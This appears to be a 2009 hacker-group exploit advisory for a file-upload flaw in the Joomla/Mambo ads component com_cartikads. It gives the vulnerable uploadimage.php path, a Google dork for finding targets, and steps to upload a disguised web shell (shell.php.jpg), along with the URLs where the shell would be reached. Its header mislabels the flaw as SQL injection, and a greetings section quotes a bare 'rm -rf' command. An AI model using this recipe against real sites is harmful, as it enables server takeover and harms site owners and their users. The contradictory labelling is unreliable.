####################################################################################[~] Joomla components com_cartikadsRemote File Upload vulnerability #[~] Author : kaMtiEz (kamzcrew@yahoo.com)#[~] Homepage : http://www.indonesiancoder.com#[~] Date : January 02,2009#####################################################################################[ Software Information ][+] Vendor : http://www.cartikahosting.com
[+] Download :-[+] version :1.0[+] Vulnerability : SQL injection
[+] Dork :"Think iT"[+] Price : dunno
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.##################################################################################[ HERE WE GO .. LIVE FROM JOGJA CITY ][ Vulnerable File ]
http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
[ NOTE ]
upload with extension shell.php.jpg
your shell will be
http://server/[kaMtiEz]/images/stories/shell.php.jpg
http://server/[kaMtiEz]/images/banners/shell.php.jpg
===========================================================================[ Thx TO ][+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ][+] Nyak ama babe gua .. tak lupa adik gua ..[+] tukulesto : where did u go ??
[+] Dengerin Radio yach di http://antisecradio.fm :D
[ QUOTE ][+] rm -rf
[ EOF ][+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
